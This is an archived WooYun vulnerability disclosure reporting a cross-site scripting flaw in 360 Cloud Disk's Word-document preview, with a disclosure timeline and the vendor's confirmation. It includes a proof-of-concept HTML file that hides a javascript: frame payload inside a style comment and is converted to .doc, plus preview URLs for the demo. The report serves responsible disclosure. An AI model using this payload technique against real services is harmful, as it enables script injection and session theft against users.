当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044435

漏洞标题:360云盘文件预览XSS

相关厂商:奇虎360

漏洞作者: 无所不能的魂大人

提交时间:2013-11-29 16:27

修复时间:2014-01-13 16:28

公开时间:2014-01-13 16:28

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-29: 细节已通知厂商并且等待厂商处理中
2013-11-29: 厂商已经确认,细节仅向厂商公开
2013-12-09: 细节向核心白帽子及相关领域专家公开
2013-12-19: 细节向普通白帽子公开
2013-12-29: 细节向实习白帽子公开
2014-01-13: 细节向公众公开

简要描述:

360云盘在预览word文件时,由于转码过滤不严,可造成XSS。
(要不是想骗个乌云的邀请码,我才懒得发出来呢)

详细说明:

首先新建一个文本文档,然后存为xxx.htm→↓

<html>
<head>
<style>
<!--
<FRAMESET><FRAME src=javascript:alert(String.fromCharCode(72,101,108,108,111,32,78,117,109,98,101,114,33))></FRAME></FRAMESET>
-->
</style>
</head>
<body>
</body>
</html>


接下来用MSword打开它,另存为doc文件。然后就可以上传到360云盘了,再然后分享,预览。
(还有其他利用方法,我就不多做叙述了。)

漏洞证明:

http://yunpan.cn/QU6mFWrKWuc3D
http://c41.yunpan.360.cn/docviewer/shareWordviewer?nid=13856425623940494&type=doc&id=undefined&hisFile=undefined&size=22528&shorturl=QU6mFWrKWuc3D&preview_sign=39ae529ce068d9f33126875d7d2fc6eb.1385713092&domain=awrl8u8bff.l41.yunpan.cn

xxoo36x


修复方案:

版权声明:转载请注明来源 无所不能的魂大人@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-11-29 17:17

厂商回复:

感谢您的反馈,该漏洞已经确认,相关技术人员正在着手修复。

最新状态:

暂无